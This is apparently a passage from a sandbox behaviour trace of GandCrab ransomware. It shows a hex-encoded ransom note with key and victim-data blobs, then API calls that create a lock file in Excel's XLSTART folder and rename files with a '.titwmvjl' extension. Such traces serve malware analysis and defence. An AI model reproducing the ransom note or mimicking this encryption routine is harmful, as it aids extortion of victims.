4\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.188] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.189] CloseHandle (hObject=0x2c4) returned 1 [0072.189] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.190] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.190] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x1f0)) [0072.190] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.190] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.190] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.191] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.191] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\xlstart\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.192] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.192] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 62 [0072.192] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0072.192] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5033f8 [0072.192] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.192] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.193] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.193] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.193] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.193] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.193] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock" [0072.193] lstrlenW (lpString=".titwmvjl") returned 9 [0072.193] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.193] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.193] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0072.193] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.193] lstrlenW (lpString=".lock") returned 5 [0072.193] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.193] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.193] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.194] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.194] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.194] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.194] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.194] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt" [0072.194] lstrlenW (lpString=".titwmvjl") returned 9 [0072.194] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt") returned 82 [0072.194] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.194] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0072.194] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt") returned 82 [0072.194] lstrlenW (lpString=".txt") returned 4 [0072.194] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.195] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.195] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.195] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\TITWMVJL-DECRYPT.txt") returned 82 [0072.195] lstrlenW 